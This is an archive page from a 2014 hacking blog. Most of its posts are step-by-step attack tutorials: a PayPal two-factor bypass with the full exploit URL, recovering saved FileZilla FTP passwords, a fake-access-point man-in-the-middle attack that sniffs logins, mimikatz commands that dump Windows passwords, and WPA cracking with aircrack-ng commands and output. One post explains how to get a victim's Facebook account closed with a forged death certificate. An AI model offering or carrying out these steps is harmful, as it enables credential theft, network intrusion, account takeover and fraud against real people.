Wednesday, August 6, 2014 4:40 AM

Paypal Complete 2-Factor Authentication(2FA) Bypass Exploit.

To make it clear: The Paypal account you were 'hacking' did NOT have to be affiliated with the eBay account you were using. In my original tests, I had made a new eBay account using a temporary email, and had gotten into my Paypal through the same method.

 

 

 Found By Joshau Rojers

 It works even without an eBay account, actually.

https://www.paypal.com/cgi-bin/webscr?cmd=_integrated-registration&key=0&stamp=1364194631&data=JGHnP2g2ybqbgKfR7%2B1loOlg24LvI/VppQIqFE8DyTO9hqc1x1pQw42CCLy3EdEogm85LYOTKtU2wYNfjFZvuHSx4PjAHLVtlv6sYdPl2FIBLN7BNr3l%2BPe0WPeDhopUWqhw0PYE9EAyZPkgIZWJgWKGGGNPqdQRjlbNGoCCIox7RLfKmtEDeH8KXEOzZDSmvETO%2B7fkoy06CLe9CkJhE0V8Mh9QN/wNYIF6WMFgHsze7RAS8Qe3j/U9I9zYXDPcfB2L5AVCYI53jcWUOxeKXSlcoV0eIcxkLOkLfmSqnaY9vywEQEhEU2PYoKSqefaZBPFh6Y7kWXVD/7id8PvkrJzKaCUq0nhBRfFGtf1kYrK0ZgX%2Byws4HmiTn4GEL/gaUPtpWviP4BCJmeGOhzQEhbFNYwzuzmOWAaqYfsa62DsAcq3LUy1DyAmBfsLhwzRyzZhKlg1NRz5MxTsuBqlh72W6ytc1gEMwh%2BJtBxZTf7EggIaTRLdpjXMlZmwRjkMH2BjX8P4968XicykzmLhTpqpg507flV%2Belq3QNBd9cAliSskS3n/%2Bd1os7FQBnogr4tZ7srcTkoPM5nezXqz3caE/loqoJnkWvlRYfNJpSSysjQ%2BThTgiwNtk4eh8X2r3LhepLD27KdM7I299%2BnWVF9veVjw625ZT%2B3MyQMiO7FbMJdng5baW%2BZIRFIear2GlEJVXMlftP3ibMJAmzGrnKqB0sPwY3augnaBNnz4u32QAaxg8zhvz5FEaELdpFxJ4ptLdRc2MFUBFkUDm%2B5tlpuNl9JzgKTDQnXzYxX/2KYAznivHTlsCcwH68kL6EqoiGGTsFoLzp8TqnLvizULu6tdfnTAhhxV6kCeRRoyN/a62wahvxDibJgTnTjp4d3/xm4nhkQhQ5/xUgtAN9T1aa7n5PinOWS84AOFR0TB3KpwHsQkoQCGXvzdYZh4wD8ECQzYS9lbpaCLm13GqPGK4xC6K2vat8/gt9uoiJbiy77SK2PcMhcRS3KbK9Z0HtDCl&ev=1.0&locale=en_US
 
On the 5th of June, 2014, I found a complete bypass for Paypal's 2FA service, in which anybody would be able to access a Paypal account that has 2FA setup, by only logging in through a "special" Paypal page.

 eBay, in conjunction with Paypal, provide a service as to where you can link your eBay account to your Paypal account, and when you sell something on eBay, the fees automatically come out of your Paypal account.

When setting this up, you're (obviously) asked for your Paypal login.

When you are redirected to the login page(above), the URL contains "=_integrated-registration". Doing a quick Google search for this shows that it isn't used for anything other than eBay; thus it is setup purely for Paypal&eBay.

Once you're actually logged in, a cookie is set with your details, and you're redirected to a page to confirm the details of the process. And this is where the exploit lays. Now just load http://www.paypal.com/ , and you are logged in, and don't need to re-enter your login.

So, the actual bug itself is that the "=_integrated-registration" function does not check for a 2FA code, despite logging you into Paypal.

You could repeat the process using the same "=_integrated-registration" page unlimited times. 
When you are redirected to the login page(above), the URL contains "=_integrated-registration". Doing a quick Google search for this shows that it isn't used for anything other than eBay; thus it is setup purely for Paypal&eBay.

Once you're actually logged in, a cookie is set with your details, and you're redirected to a page to confirm the details of the process. And this is where the exploit lays. Now just load http://www.paypal.com/ , and you are logged in, and don't need to re-enter your login.

So, the actual bug itself is that the "=_integrated-registration" function does not check for a 2FA code, despite logging you into Paypal.

You could repeat the process using the same "=_integrated-registration" page unlimited times. 

 I originally found this on the 5th of June, 2014, and reported it to Paypal the same day.

I have also uploaded a demonstration of it on YouTube.


It still works.


For Complete Tutorial Contact me on Facebook or Twitter
https://www.facebook.com/zxera
https://www.twitter.com/Yedens

For Educational Porpose only

Monday, July 14, 2014 3:37 AM

How to Crack FTP password from FileZilla??

Wonder How to crack FTP password from FileZilla, when it is an application to connect to FTP server? Well guys this is not a hack. it is simply a Trick so that you can Grab bunch of passwords that were connected to FTP server from FIlezilla.

Beware, FileZilla doesn't protect your password. 
It simply save your password in xml data in your users Roaming directry.

In this tutorial we will go through how to extract saved password in Filezilla so without wasting time lets start step by step tutorial




 

 

 

Step 1:

Go to your desktop, Here im using desktop tab in favorite now go to Users (system folder).
  

 

Step 2:

Before going further lets we unhide(show hidden items) everything. So it will help us in future steps
for doing this
goto view on top of your explorer
and make sure you've checked on hidden items

Step 3:

Now you're ready to go further.. if you've done properly in above step 2 you should see AppData Directory. Now go to AppData and open Roaming directory


  

Step 4:

Now you should see FileZilla folder inside Roaming Directory
Open FileZilla.

Now You should see some xml files (filezilla.xml, filters.xml, queue.xml and other)
Right Click on recentservers.xml left click on "Edit with Notepad+" or simply "Edit" in drop menu

Step 5:

Now voila, You've successfully cracked FTP password :D

Conclusion

Never leave your history.. always clear your history after using FileZilla for protecting your password.. in 2009 many of the servers were hacked by FileZilla malwares. by default FIlezilla doesn't protect your password

hope you've enjoyed tutorials

Sunday, June 22, 2014 5:23 PM

A Beginners Guide to Ethical Hacking - E-BOOK

A Beginners Guide to Ethical Hacking is a complete path for newbie hackers who want are curious to Learn Ethical Hacking Techniques.The Information given in this book will make you a master hacker.

How will the information in the book affect me?

  • You will learn All Ethical hacking techniques and also you will learn to apply them in real world situation
  • You will start to think like hackers
  • Secure your computer from trojans,worms, Adwares etc
  • Amaze your friends with your newly learned tricks
  • You will be able to protect your self from future hack attacks
 Download it for free


Wifi Packet Capturing and Session Hijacking using Wireshark 2

Before you go to this section it is required you to read first tutorial
Wifi Packet Capturing and Session Hijacking using Wireshark 1

Step - 7 

Now Setting up New configurations by typing these commands. 
“ifconfig eth0 0.0.0.0 up”  
“ifconfig at0 0.0.0.0 up” 
   
Description -  
ifconfig stands for interface configurator. ifconfig command is used to configure network interfaces. ifconfig is widely used to initialize the network interface and to enable or disable the interfaces.  

Step -8

Now it’s turn on MITM Interface by typing this command 
“ifconfig mitm up”  

Description –  
ifconfig stands for interface configurator. ifconfig command is used to configure network interfaces. ifconfig is widely used to initialize the network interface and to enable or disable the interfaces. 
By Default Interface we created is down, we need to put it up.

Step – 9 

Now send the deauthentication packets to the router by typing this command
“aireplay-ng - - deauth 0 - a 94:44:52:DA:B4:28 mon0”   

Description –  
Aireplay-ng is used to inject frames.  
The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake authentications, Interactive packet replay, hand- crafted ARP request injection and ARP-request reinjection. 
We use 0 for continuous Flooding of packets. We use 1 for Single Flooding of packet. 
-a represent bssid of the victim network. 94:44:52:DA:B4:28 here is a bssid of the victim network.

Step - 10

Now it’s time to assigning the IP to all victims by typing this command
“dhclient3 mitm&”   OR  “dhclient3 mitm &”  

Description –  
Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of numbers (i.e., a scope) configured for a given network. 

Step – 11 

Now you can check the client connected on the 5th Terminal where you create Fake Access point.

Step – 12 

Start your Wireshark Packet Analyzer Tool by typing this command 
“wireshark&”   OR   “wireshark &  

Description –   
 Wireshark is an open source tool for profiling network traffic and analyzing packets. Such a tool is often referred to as a network analyzer, network protocol analyzer or sniffer.

Step – 13 

Now Select the Interface (at0) and click on START

Type “http contains POST” and you can see that all packets be in your sniffing tool


and you'll get user name and password :)
Happy hacking


Wifi Packet Capturing and Session Hijacking using Wireshark 1



The main Objective of this Attack is to make a Fake Access point and send the fake ARP Packets on same Wi-Fi Network from where the users are connected and the name of fake access point is same as the name of the wireless network reside there. So when a fake access point is created with same wireless network name then the user which is connected to original network gets disconnected and connects with your fake access point, so all the traffic tunnels throughout my system and we get all details/credentials/information of that user which is generally known as session hijacking.

 

Requirements

1. Backtrack Operating System (BT5)
2. Virtual Machine (With USB Adapter)
3. Internet Access on your System 

Step 1

Open Backtrack Operating System and start Terminal and type “iwconfig” for checking wireless interface.

Description – 
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces. It is used to set the parameters of the network interface which are specific to the wireless operation (for example: the frequency).

Step - 2

Start this Wireless Interface by typing this command 
“airmon-ng start wlan0”.
 
Description – 
This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show the interfaces status. 
wlan0 is your wifi card.  wlan is wireless lan and 0 is the number of your card.

Step - 3

Start your monitor mode by typing this command “airodump-ng mon0”. It captures data from all stations. 

Description -    
Airodump-ng is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (Initialization Vector) for the intent of using them with aircrack-ng. Also airodump-ng is capable of logging the coordinates of the found access points. 
mon0 is the same card (wlan0) in monitor mode.  Once you put wlan0 in monitor mode it will be read as mon0 and wlan0

Step - 4

Set up the channel ID which is shown above in airodump-ng command by typing these commands   “iwconfig mon0 channel 5”      “iwconfig wlan0 channel 5
                                               OR 
iwconfig wlan0 channel 5”     “iwconfig mon0 channel 5”  

Decription -  
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces. It is used to set the parameters of the network interface which are specific to the wireless operation (for example: the frequency).
wlan0 is your wifi card.  wlan is wireless lan and 0 is the number of your card. 
mon0 is the same card (wlan0) in monitor mode.  Once you put wlan0 in monitor mode it will be read as mon0 and wlan0. 
The ”–channel” (-c) option allows a single or specific channels to be selected.

Step -5

Now Setup your Fake Router by typing this command 
“airbase-ng - e “belkin.3448” mon0” 
Description – 
Airbase-ng is multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself. The main idea is of the implementation is that it should encourage clients to associate with the fake AP, not prevent them from accessing the real AP.
”– essid” (-e) of the Network.

Step - 6 

Now it’s time to bridge all networks by typing these commands   
“brctl addbr mitm”  
“brctl addif mitm eth0” 
 “brctl addif mitm at0”
Here – mitm is <interface name>
Description - 
Brctl - is used to create a bridge between two interfaces. 
Addbr - A bridge can be added using the following command, with <name> being replaced with the name of the bridge being replaced. 
Addif - To add a interface to a bridge, Where <brname> is the existing bridge name, and ifname is the interface you want to add.

Wednesday, June 11, 2014 7:39 AM

Far Cry 4 World Gameplay (Nepal) Premiere- Walkthrough E3 2014











Watch the first Far Cry 4 game play footage, introducing the #1 most requested feature among fans: open-world co-op with a friend!


Included Environment Concept of Nepal and Bhutan

About Far Cry 4
Far Cry 4 delivers a massive new open world for you to explore and survive. Hidden in the towering Himalayas lies Kyrat, a country steeped in tradition and violence. You are Ajay Ghale. Traveling to Kyrat to fulfill your mother's dying wish, you find yourself caught up in a civil war to overthrow the oppressive regime of dictator Pagan Min. Explore and navigate this vast open world, where danger and unpredictability lurk around every corner. Here, every decision counts, and every second is a story

Tuesday, June 10, 2014 12:11 AM

Hack Windows password in notime

So you were looking for Windows 8 password hacking tool. Never found any interesting post; right?

Now here I'm back with 100% working Windows 8 password hacking tutorial

So what are you looking at start downloading tool and proceed step by step

Step 1

Download Tool [click here]
Now Extract downloaded tools where ever you want

Step 2

Open appropriate folder x64 or win32 suitable for your Operating System

Step 3

Run mimikatz as a Administrator
on Firewall notification select "Yes"

Step 4

Now this screen will be displayed


 

Step 5

To Check privilege is given or not enter the code below:-
privilege::debug
You should get result like below image

Step 6

If you get privilege as image above now you are ready to get password
now Enter the command below to get the password
 sekurlsa::logonPasswords full
there is space after passwords 
   
 Hope you've enjoyed this tutorial :) please comment your feedback

Friday, June 6, 2014 4:24 AM

Close Facebook Accounts

What this guide will show you, is how to get any facebook account closed. You will do this by tricking facebook into thinking the person is dead, so they will close the account.

This simple tutorial will help you to close your friends, family or anyone's facebook account if he/she is no more in this world. All the best (y)
 
 
 
 
 
 
  1. Goto
  1. Full Name: Your Victims Full name(Name last name)
    Date of birth: Go at his profile and click at Info tab and get his date of birth.
    Account Email Addresses: Do the same thing, go to his profile and click on info tab and get his email addresses.
    Networks: Again,go to his profile and click on Info tab and get his networks, copy them and paste in the form.
    Web address of profile you would like to report: Just go to his profile and copy the link in the address bar.
    Relationship to this person: To make more believable select Immediate Family.
    Requested Action: Remove Profile
    Proof Of Death: This is the hardest part of this form. Now to make a proof of a death just Google in your language a Death Certificate or Certificate of a Death. Open up the image in photoshop and fill in the blanks. Save your image to desktop and upload it in one of the Image
    Free Hosting like: http://imageshack.us
    Additional Information: Write what you want, just write that you are in his/her family and you would like to close his/her Facebook account because you won't like that when he is dead, his Facebook is opened.
  2. Click on Submit and then a message will appear:
    Your injury was submitted at Facebook Team .. So the meaning is that one of the mod's of Facebook will review your report and will do the right decision. It works in most of the time.
 

Sunday, June 1, 2014 7:48 AM

Vulnerabilities in 'All in One SEO Pack' Wordpress Plugin Put Millions of Sites At Risk

Multiple Serious vulnerabilities have been discovered in the most famous ‘All In One SEO Pack’ plugin for WordPress, that put millions of Wordpress websites at risk.

WordPress is easy to setup and use, that’s why large number of people like it. But if you or your company is using ‘All in One SEO Pack’ Wordpress plugin to optimize the website ranking in search engines, then you should update your SEO plugin immediately to the latest version of All in One SEO Pack 2.1.6.

Today, All in One SEO Pack plugin team has released an emergency security update that patches two critical privilege escalation vulnerabilities and one cross site scripting (XSS) flaw, discovered by security researchers at Sucuri, a web monitoring and malware clean up service.

More than 73 million websites on the Internet run their websites on the WordPress publishing platform and more than 15 million websites are currently using All in One SEO Pack plugin for search engine optimization.

According to Sucuri, the reported privilege escalation vulnerabilities allow an attacker to add and modify the WordPress website’s meta information, that could harm its search engine ranking negatively.

"In the first case, a logged-in user, without possessing any kind of administrative privileges (like an author of subscriber), could add or modify certain parameters used by the plugin. It includes the post’s SEO title, description and keyword meta tags." Sucuri said.
 Also the reported cross-site scripting vulnerability can be exploited by malicious hackers to execute malicious JavaScript code on an administrator’s control panel. "This means that an attacker could potentially inject any JavaScript code and do things like changing the admin’s account password to leaving some backdoor in your website’s files in order to conduct even more “evil” activities later." Sucuri blog post said.

Vulnerability in WordPress plugins is the root cause for the majority of WordPress exploitation and this is one of the main tools in the web hackers' arsenal. The plugin vulnerabilities could be exploited to access sensitive information, deface websites, redirect visitors to any malicious site, or to perform DDoS attacks.

Till now, we haven't seen any web attacks conducted by exploiting these vulnerabilities in the wild, but WordPress website owners are recommended to update their All in One SEO Pack Wordpress plugin to the latest version immediately.

Thursday, May 29, 2014 12:58 AM

Tutorial 3: How to Crack WPA/WPA2


Step 2 - Start airodump-ng to collect authentication handshake

The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.

Enter:



airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Where:
-c 9 is the channel for the wireless network
--bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
-w psk is the file name prefix for the file which will contain the IVs.
ath0 is the interface name.

Important: Do NOT use the "--ivs" option. You must capture the full packets.

Here what it looks like if a wireless client is connected to the network:



CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80



BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID



00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy



BSSID STATION PWR Lost Packets Probes



00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116

In the screen above, notice the "WPA handshake: 00:14:6C:7E:40:80" in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients:



CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51



BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID



00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy



BSSID STATION PWR Lost Packets Probes

Troubleshooting Tip
See the Troubleshooting Tips section below for ideas.

To see if you captured any handshake packets, there are two ways. Watch the airodump-ng screen for " WPA handshake: 00:14:6C:7E:40:80" in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot.

Use Wireshark and apply a filter of "eapol". This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets.



Step 3 - Use aireplay-ng to deauthenticate the wireless client

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following. Open another console session and enter:



aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Where:
-0 means deauthentication
1 is the number of deauths to send (you can send multiple if you wish)
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
ath0 is the interface name

Here is what the output looks like:



11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

With luck this causes the client to reauthenticate and yield the 4-way handshake.


Troubleshooting Tips

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not "hear" the deauthentication packet.


Step 4 - Run aircrack-ng to crack the pre-shared key

The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.

There is a small dictionary that comes with aircrack-ng - "password.lst". This file can be found in the "test" directory of the aircrack-ng source code. The Wiki FAQ has an extensive list of dictionary sources. You can use John the Ripper (JTR) to generate your own list and pipe them into aircrack-ng. Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.

Open another console session and enter:



aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Where:
-w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Here is typical output when there are no handshakes found:



Opening psk-01.cap

Opening psk-02.cap

Opening psk-03.cap

Opening psk-04.cap

Read 1827 packets.

No valid WPA handshakes found.

When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. When using the passive approach, you have to wait until a wireless client authenticates to the AP.

Here is typical output when handshakes are found:



Opening psk-01.cap

Opening psk-02.cap

Opening psk-03.cap

Opening psk-04.cap

Read 1827 packets.



# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 teddy WPA (1 handshake)



Choosing first network as target.

Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days.

Here is what successfully cracking the pre-shared key looks like:



Aircrack-ng 0.8





[00:00:00] 2 keys tested (37.20 k/s)





KEY FOUND! [ 12345678 ]





Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E

B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD



Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98

CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40

FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E

2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71



EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB




Recent Post

Total Pageviews

Powered by Blogger.

Popular Posts